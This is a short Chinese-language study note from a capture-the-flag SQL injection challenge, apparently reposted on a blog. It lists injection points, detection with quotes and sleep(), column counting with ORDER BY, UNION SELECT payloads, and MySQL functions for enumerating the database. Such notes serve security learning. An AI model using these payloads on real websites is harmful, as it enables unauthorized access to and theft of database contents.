題目來源 i春秋 sql01
尋找注入點
1,例如url上的?id= get方式的傳遞
2,或者post請求
3,X-Forwarded-For:
4,cookie
5,user-Agent
表單域 登錄框 等等也可能通過SQL注入的萬能密碼登錄進去 web應用程式的各種表單對資料處理也可能存在注入點
注入點判斷
1: ‘(單引號)
2: 數值型可以進行加減法
3: and sleep(1) 1代表秒數
–是注釋 +是空格 可以用’ and sleep(10)–+ *
判斷出注入點后
可以用order by 6 進行欄位查詢 查詢到所在欄位之后 就可以union聯合注入了
例如 order by 4 正常 order by 5報錯 則欄位為4
之后就可以union select 1,2,3,4 可能會存在waf 需要繞過 (去百度搜union select 繞過字典)
可以將原本提交的引數改掉 換為直接顯示我們的1,2,3,4 例如
?id=23’ union select 1,2,3,4–+
改為
?id=-23’ union select 1,2,3,4–+
常用資料庫查詢函式
version()----MySQL版本
user()----資料庫用戶名
current_user()----鏈接資料庫的用戶名
database()----資料庫名
@@version----資料庫版本
@@datadir----資料庫路徑
table_name為表名
information_schema是系統自帶庫
column是欄位
column_name欄位名
轉載請註明出處,本文鏈接:https://www.uj5u.com/shujuku/277400.html
標籤:其他
上一篇:資料庫基礎知識(上)